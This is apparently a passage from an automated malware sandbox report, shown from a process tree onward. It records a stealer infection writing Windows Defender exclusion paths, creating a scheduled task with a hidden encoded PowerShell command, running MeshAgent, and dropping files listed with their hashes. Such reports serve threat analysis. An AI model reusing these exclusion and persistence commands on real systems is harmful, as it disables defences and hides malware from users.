                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\IzHIiCzEU" /t REG_DWORD /d 0 /reg:32
                                                                                                                            3⤵
                                                                                                                              PID:5860
                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\IzHIiCzEU" /t REG_DWORD /d 0 /reg:64
                                                                                                                              3⤵
                                                                                                                                PID:1444
                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\JMqUiwfxGTAnC" /t REG_DWORD /d 0 /reg:32
                                                                                                                                3⤵
                                                                                                                                  PID:2264
                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\JMqUiwfxGTAnC" /t REG_DWORD /d 0 /reg:64
                                                                                                                                  3⤵
                                                                                                                                    PID:5100
                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PZogILZPltnU2" /t REG_DWORD /d 0 /reg:32
                                                                                                                                    3⤵
                                                                                                                                      PID:2712
                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PZogILZPltnU2" /t REG_DWORD /d 0 /reg:64
                                                                                                                                      3⤵
                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                      PID:4816
                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\VcmwxBYZVXUn" /t REG_DWORD /d 0 /reg:32
                                                                                                                                      3⤵
                                                                                                                                        PID:224
                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\VcmwxBYZVXUn" /t REG_DWORD /d 0 /reg:64
                                                                                                                                        3⤵
                                                                                                                                          PID:1052
                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\wVyQrcfqlRUHlPVB /t REG_DWORD /d 0 /reg:32
                                                                                                                                          3⤵
                                                                                                                                            PID:1672
                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\wVyQrcfqlRUHlPVB /t REG_DWORD /d 0 /reg:64
                                                                                                                                            3⤵
                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                            PID:2924
                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
                                                                                                                                            3⤵
                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                            PID:5964
                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
                                                                                                                                            3⤵
                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                            PID:2020
                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
                                                                                                                                            3⤵
                                                                                                                                              PID:3232
                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
                                                                                                                                              3⤵
                                                                                                                                                PID:2316
                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\vJPXtkvkgIniScojh /t REG_DWORD /d 0 /reg:32
                                                                                                                                                3⤵
                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                PID:5888
                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\vJPXtkvkgIniScojh /t REG_DWORD /d 0 /reg:64
                                                                                                                                                3⤵
                                                                                                                                                  PID:1308
                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\JXQwtsvqcJittKph /t REG_DWORD /d 0 /reg:32
                                                                                                                                                  3⤵
                                                                                                                                                    PID:5620
                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\JXQwtsvqcJittKph /t REG_DWORD /d 0 /reg:64
                                                                                                                                                    3⤵
                                                                                                                                                      PID:5400
                                                                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                    schtasks /CREATE /TN "gAHvxJjJS" /SC once /ST 05:37:14 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                                                                                                                                    2⤵
                                                                                                                                                    • Scheduled Task/Job: Scheduled Task
                                                                                                                                                    PID:3260
                                                                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                    schtasks /run /I /tn "gAHvxJjJS"
                                                                                                                                                    2⤵
                                                                                                                                                      PID:1524
                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exe
                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exe
                                                                                                                                                    1⤵
                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                    PID:1812
                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                                                                                                    1⤵
                                                                                                                                                    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                                                    • Checks BIOS information in registry
                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                    • Identifies Wine through registry keys
                                                                                                                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                    PID:1396
                                                                                                                                                  • C:\Program Files (x86)\Mesh Agent\MeshAgent.exe
                                                                                                                                                    "C:\Program Files (x86)\Mesh Agent\MeshAgent.exe"
                                                                                                                                                    1⤵
                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                    • Drops file in System32 directory
                                                                                                                                                    • Drops file in Program Files directory
                                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                                    PID:5168
                                                                                                                                                    • C:\Windows\SysWOW64\wbem\wmic.exe
                                                                                                                                                      wmic SystemEnclosure get ChassisTypes
                                                                                                                                                      2⤵
                                                                                                                                                        PID:2484
                                                                                                                                                      • C:\Windows\SysWOW64\wbem\wmic.exe
                                                                                                                                                        wmic os get oslanguage /FORMAT:LIST
                                                                                                                                                        2⤵
                                                                                                                                                          PID:4520
                                                                                                                                                        • C:\Windows\SysWOW64\wbem\wmic.exe
                                                                                                                                                          wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"
                                                                                                                                                          2⤵
                                                                                                                                                            PID:4160
                                                                                                                                                          • C:\Windows\SysWOW64\wbem\wmic.exe
                                                                                                                                                            wmic SystemEnclosure get ChassisTypes
                                                                                                                                                            2⤵
                                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                                            PID:5300
                                                                                                                                                          • C:\Windows\SysWOW64\wbem\wmic.exe
                                                                                                                                                            wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"
                                                                                                                                                            2⤵
                                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                                            PID:3880
                                                                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                                                                                                                                          C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                                                                                                                                                          1⤵
                                                                                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                                                                                          PID:208
                                                                                                                                                          • C:\Windows\system32\gpupdate.exe
                                                                                                                                                            "C:\Windows\system32\gpupdate.exe" /force
                                                                                                                                                            2⤵
                                                                                                                                                              PID:5628
                                                                                                                                                          • C:\Windows\system32\svchost.exe
                                                                                                                                                            C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
                                                                                                                                                            1⤵
                                                                                                                                                              PID:1900
                                                                                                                                                            • C:\Windows\system32\svchost.exe
                                                                                                                                                              C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
                                                                                                                                                              1⤵
                                                                                                                                                                PID:872
                                                                                                                                                              • C:\Windows\system32\gpscript.exe
                                                                                                                                                                gpscript.exe /RefreshSystemParam
                                                                                                                                                                1⤵
                                                                                                                                                                  PID:5100
                                                                                                                                                                • C:\Program Files (x86)\Mesh Agent\MeshAgent.exe
                                                                                                                                                                  "C:\Program Files (x86)\Mesh Agent\MeshAgent.exe"
                                                                                                                                                                  1⤵
                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                  • Drops file in System32 directory
                                                                                                                                                                  • Drops file in Program Files directory
                                                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                                                  • Modifies data under HKEY_USERS
                                                                                                                                                                  PID:5616
                                                                                                                                                                  • C:\Windows\SysWOW64\wbem\wmic.exe
                                                                                                                                                                    wmic SystemEnclosure get ChassisTypes
                                                                                                                                                                    2⤵
                                                                                                                                                                      PID:2524
                                                                                                                                                                    • C:\Windows\SysWOW64\wbem\wmic.exe
                                                                                                                                                                      wmic os get oslanguage /FORMAT:LIST
                                                                                                                                                                      2⤵
                                                                                                                                                                        PID:5812
                                                                                                                                                                      • C:\Windows\SysWOW64\wbem\wmic.exe
                                                                                                                                                                        wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"
                                                                                                                                                                        2⤵
                                                                                                                                                                          PID:4128
                                                                                                                                                                        • C:\Windows\SysWOW64\wbem\wmic.exe
                                                                                                                                                                          wmic SystemEnclosure get ChassisTypes
                                                                                                                                                                          2⤵
                                                                                                                                                                            PID:3100
                                                                                                                                                                          • C:\Windows\SysWOW64\wbem\wmic.exe
                                                                                                                                                                            wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"
                                                                                                                                                                            2⤵
                                                                                                                                                                              PID:5024
                                                                                                                                                                          • C:\Program Files (x86)\Mesh Agent\MeshAgent.exe
                                                                                                                                                                            "C:\Program Files (x86)\Mesh Agent\MeshAgent.exe"
                                                                                                                                                                            1⤵
                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                            • Drops file in System32 directory
                                                                                                                                                                            • Drops file in Program Files directory
                                                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                                                            • Modifies data under HKEY_USERS
                                                                                                                                                                            PID:1000
                                                                                                                                                                            • C:\Windows\SysWOW64\wbem\wmic.exe
                                                                                                                                                                              wmic SystemEnclosure get ChassisTypes
                                                                                                                                                                              2⤵
                                                                                                                                                                                PID:740
                                                                                                                                                                              • C:\Windows\SysWOW64\wbem\wmic.exe
                                                                                                                                                                                wmic os get oslanguage /FORMAT:LIST
                                                                                                                                                                                2⤵
                                                                                                                                                                                  PID:5368
                                                                                                                                                                                • C:\Windows\SysWOW64\wbem\wmic.exe
                                                                                                                                                                                  wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"
                                                                                                                                                                                  2⤵
                                                                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                                                                  PID:3824
                                                                                                                                                                                • C:\Windows\SysWOW64\wbem\wmic.exe
                                                                                                                                                                                  wmic SystemEnclosure get ChassisTypes
                                                                                                                                                                                  2⤵
                                                                                                                                                                                    PID:5420
                                                                                                                                                                                  • C:\Windows\SysWOW64\wbem\wmic.exe
                                                                                                                                                                                    wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"
                                                                                                                                                                                    2⤵
                                                                                                                                                                                      PID:4832
                                                                                                                                                                                  • C:\Program Files (x86)\Mesh Agent\MeshAgent.exe
                                                                                                                                                                                    "C:\Program Files (x86)\Mesh Agent\MeshAgent.exe"
                                                                                                                                                                                    1⤵
                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                    • Drops file in System32 directory
                                                                                                                                                                                    • Drops file in Program Files directory
                                                                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                                                                    • Modifies data under HKEY_USERS
                                                                                                                                                                                    PID:2144
                                                                                                                                                                                    • C:\Windows\SysWOW64\wbem\wmic.exe
                                                                                                                                                                                      wmic SystemEnclosure get ChassisTypes
                                                                                                                                                                                      2⤵
                                                                                                                                                                                        PID:3216
                                                                                                                                                                                      • C:\Windows\SysWOW64\wbem\wmic.exe
                                                                                                                                                                                        wmic os get oslanguage /FORMAT:LIST
                                                                                                                                                                                        2⤵
                                                                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                                                                        PID:5932
                                                                                                                                                                                      • C:\Windows\SysWOW64\wbem\wmic.exe
                                                                                                                                                                                        wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"
                                                                                                                                                                                        2⤵
                                                                                                                                                                                          PID:5412
                                                                                                                                                                                        • C:\Windows\SysWOW64\wbem\wmic.exe
                                                                                                                                                                                          wmic os get oslanguage /FORMAT:LIST
                                                                                                                                                                                          2⤵
                                                                                                                                                                                            PID:4956
                                                                                                                                                                                          • C:\Windows\SysWOW64\wbem\wmic.exe
                                                                                                                                                                                            wmic SystemEnclosure get ChassisTypes
                                                                                                                                                                                            2⤵
                                                                                                                                                                                              PID:5608
                                                                                                                                                                                            • C:\Windows\SysWOW64\wbem\wmic.exe
                                                                                                                                                                                              wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"
                                                                                                                                                                                              2⤵
                                                                                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                                                                                              PID:5628
                                                                                                                                                                                          • C:\Program Files (x86)\Mesh Agent\MeshAgent.exe
                                                                                                                                                                                            "C:\Program Files (x86)\Mesh Agent\MeshAgent.exe"
                                                                                                                                                                                            1⤵
                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                            • Drops file in System32 directory
                                                                                                                                                                                            • Drops file in Program Files directory
                                                                                                                                                                                            PID:2120
                                                                                                                                                                                            • C:\Windows\SysWOW64\wbem\wmic.exe
                                                                                                                                                                                              wmic SystemEnclosure get ChassisTypes
                                                                                                                                                                                              2⤵
                                                                                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                                                                                              PID:5904
                                                                                                                                                                                            • C:\Windows\SysWOW64\wbem\wmic.exe
                                                                                                                                                                                              wmic os get oslanguage /FORMAT:LIST
                                                                                                                                                                                              2⤵
                                                                                                                                                                                                PID:2268
                                                                                                                                                                                              • C:\Windows\SysWOW64\wbem\wmic.exe
                                                                                                                                                                                                wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"
                                                                                                                                                                                                2⤵
                                                                                                                                                                                                  PID:4836
                                                                                                                                                                                                • C:\Windows\SysWOW64\wbem\wmic.exe
                                                                                                                                                                                                  wmic os get oslanguage /FORMAT:LIST
                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                    PID:4772
                                                                                                                                                                                                  • C:\Windows\SysWOW64\wbem\wmic.exe
                                                                                                                                                                                                    wmic SystemEnclosure get ChassisTypes
                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                                                                                    PID:5896
                                                                                                                                                                                                  • C:\Windows\SysWOW64\wbem\wmic.exe
                                                                                                                                                                                                    wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"
                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                                                                                    PID:5480

                                                                                                                                                                                                Network

                                                                                                                                                                                                MITRE ATT&CK Enterprise v15

                                                                                                                                                                                                Replay Monitor

                                                                                                                                                                                                Loading Replay Monitor...

                                                                                                                                                                                                Downloads

                                                                                                                                                                                                • C:\Program Files (x86)\Mesh Agent\MeshAgent.db

                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                  388KB

                                                                                                                                                                                                  MD5

                                                                                                                                                                                                  32d981971f14a8c9a33e05327a8b018d

                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                  a0020d346ee6127c88283ecb1a15d28b0dc0b5fd

                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                  7f767e19e1c48d761cda1ab6e781dc8010b789a8c7f17fe440022ef0ae2321fb

                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                  239ca15578b61b8ee4e01b41c6f318d3f356e13dc3e9087456565ba66f2a54d403f02633356b907873c519ac78118ef2717f494854c640ed0cec28fbb07a65a3

                                                                                                                                                                                                • C:\ProgramData\mozglue.dll

                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                  593KB

                                                                                                                                                                                                  MD5

                                                                                                                                                                                                  c8fd9be83bc728cc04beffafc2907fe9

                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                  95ab9f701e0024cedfbd312bcfe4e726744c4f2e

                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                  ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a

                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                  fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040

                                                                                                                                                                                                • C:\ProgramData\nss3.dll

                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                  2.0MB

                                                                                                                                                                                                  MD5

                                                                                                                                                                                                  1cc453cdf74f31e4d913ff9c10acdde2

                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                  6e85eae544d6e965f15fa5c39700fa7202f3aafe

                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                  ac5c92fe6c51cfa742e475215b83b3e11a4379820043263bf50d4068686c6fa5

                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                  dd9ff4e06b00dc831439bab11c10e9b2ae864ea6e780d3835ea7468818f35439f352ef137da111efcdf2bb6465f6ca486719451bf6cf32c6a4420a56b1d64571

                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                  152B

                                                                                                                                                                                                  MD5

                                                                                                                                                                                                  719923124ee00fb57378e0ebcbe894f7

                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                  cc356a7d27b8b27dc33f21bd4990f286ee13a9f9

                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                  aa22ab845fa08c786bd3366ec39f733d5be80e9ac933ed115ff048ff30090808

                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                  a207b6646500d0d504cf70ee10f57948e58dab7f214ad2e7c4af0e7ca23ce1d37c8c745873137e6c55bdcf0f527031a66d9cc54805a0eac3678be6dd497a5bbc

                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                  5KB

                                                                                                                                                                                                  MD5

                                                                                                                                                                                                  e3d3a1c67c306de2f31a19c85864c747

                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                  5374a9321697733339922e5883fdd0c43838728d

                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                  d8eb6fd0b408d3abffbdb48f8d0d749128cf4a9b4a1c071eacb1bf07c16d00eb

                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                  ac45c0f2c48d9aabbda7f9cdc92831f08ec5d83a0068f95b12500d0b21840269a508f39fbcdb84bef1032b638917e41c3bfb7c02aa9b06f91100060a2c98bd8e

                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                  8KB

                                                                                                                                                                                                  MD5

                                                                                                                                                                                                  904b1c55b5f13b68fb94eabceb7afa8d

                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                  5283360ac300cb7f5c226fef2f3e992d326b2a8c

                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                  ccd50f5b8c61618b7958816e5c387df8e9822f96e8d682992b82bcefce2135ba

                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                  dddde59c6117690d7c15d985f090e6e62d171796543d0534e9ed779fbae3a74c2dd40350b6e08db39c5c7bcb4fa641b96a5784bf200068029433ab4eeec08e1f

                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\1000002001\gold.exe

                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                  312KB

                                                                                                                                                                                                  MD5

                                                                                                                                                                                                  389881b424cf4d7ec66de13f01c7232a

                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                  d3bc5a793c1b8910e1ecc762b69b3866e4c5ba78

                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                  9d1211b3869ca43840b7da1677b257ad37521aab47719c6fcfe343121760b746

                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                  2b9517d5d9d972e8754a08863a29e3d3e3cfde58e20d433c85546c2298aad50ac8b069cafd5abb3c86e24263d662c6e1ea23c0745a2668dfd215ddbdfbd1ab96

                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\1000004001\crypteda.exe

                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                  1.1MB

                                                                                                                                                                                                  MD5

                                                                                                                                                                                                  ec23d4868753f523df127f531451dcbd

                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                  8a172e091d057a8db1e3e1999d48060967b99f36

                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                  5a4308d45dc245870376ece2209450e5ca46872e632c81c3c61178f139ef223d

                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                  2e7b63f43a49514d9c98f4ef1964d4ad2b2eef5d88500098246a31d6391f68715bd2a216a662836815615fe4cc2410fe32eacfdd0d7b3cf16f58c816a0c651fb

                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\1000005001\Nework.exe

                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                  416KB

                                                                                                                                                                                                  MD5

                                                                                                                                                                                                  f5d7b79ee6b6da6b50e536030bcc3b59

                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                  751b555a8eede96d55395290f60adc43b28ba5e2

                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                  2f1aff28961ba0ce85ea0e35b8936bc387f84f459a4a1d63d964ce79e34b8459

                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                  532b17cd2a6ac5172b1ddba1e63edd51ab53a4527204415241e3a78e8ffeb9728071bde5ae1eefabefd2627f00963f8a5458668cd7b8df041c8683252ff56b46

                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\1000063001\JavvvUmar.exe

                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                  176KB

                                                                                                                                                                                                  MD5

                                                                                                                                                                                                  2650a74d8c11c04a0eadc2d2dea3b33d

                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                  0196f6051c0a80816d737edef4efd55b26609fb0

                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                  9987c7f9f9ea1913f99c8fc023334f50a87e7cff92ee6213c30d07b94f67da84

                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                  02339f40990e1f7c47f893ae4e18a81af1cbc2081a6c5679b1bc7a618069fc4bf5bd9d1d3e93ddd9d97f1103082bebb4be51214c02595001be60f4d2138ca4c0

                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\1000066001\stealc_default2.exe

                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                  187KB

                                                                                                                                                                                                  MD5

                                                                                                                                                                                                  7a02aa17200aeac25a375f290a4b4c95

                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                  7cc94ca64268a9a9451fb6b682be42374afc22fd

                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                  836799fd760eba25e15a55c75c50b977945c557065a708317e00f2c8f965339e

                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                  f6ebfe7e087aa354722cea3fddd99b1883a862fb92bb5a5a86782ea846a1bff022ab7db4397930bcabaa05cb3d817de3a89331d41a565bc1da737f2c5e3720b6

                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\1000191001\needmoney.exe

                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                  4.1MB

                                                                                                                                                                                                  MD5

                                                                                                                                                                                                  7fa5c660d124162c405984d14042506f

                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                  69f0dff06ff1911b97a2a0aa4ca9046b722c6b2f

                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                  fd3edfaff77dd969e3e0d086495e4c742d00e111df9f935ed61dfba8392584b2

                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                  d50848adbfe75f509414acc97096dad191ae4cef54752bdddcb227ffc0f59bfd2770561e7b3c2a14f4a1423215f05847206ad5c242c7fd5b0655edf513b22f6c

                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\1000254001\penis.exe

                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                  494KB

                                                                                                                                                                                                  MD5

                                                                                                                                                                                                  6760374f17416485fa941b354d3dd800

                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                  d88389ec19ac3e87bc743ba3f8b7c518601fdbf9

                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                  9dc31fbd03da881700908423eb50c6b0c42c87fec28e817449d3dd931802c9f5

                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                  6e4d2f17cb93fe831198c2eaa35bf030d6a06d620645d3e1452c6bd6e77e42baa9dc323fd60a2c5ae1d89124adde69972c489739d4bd73ba01b95b829a777eab

                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\1000259001\bundle.exe

                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                  304KB

                                                                                                                                                                                                  MD5

                                                                                                                                                                                                  30daa686c1f31cc4833bd3d7283d8cdc

                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                  70f74571fafe1b359cfe9ce739c3752e35d16cf5

                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                  504518e3b4f3abc7f1ae1bf205fdc4a9f739e05b5e84618bae9c7e66bdc19822

                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                  9f6c0eea9f03f9aa35ebf27ce8264e41d9072d273d1b8a35415ae4666d31013d895d1108dd67e36910200e2ac4fc45a4a9d761a1aadf02b0fd29ef93cd20a4d9

                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\1000284001\acentric.exe

                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                  454KB

                                                                                                                                                                                                  MD5

                                                                                                                                                                                                  37d198ad751d31a71acc9cb28ed0c64e

                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                  8eb519b7a6df66d84c566605da9a0946717a921d

                                                                                                                                                                                                  SHA256

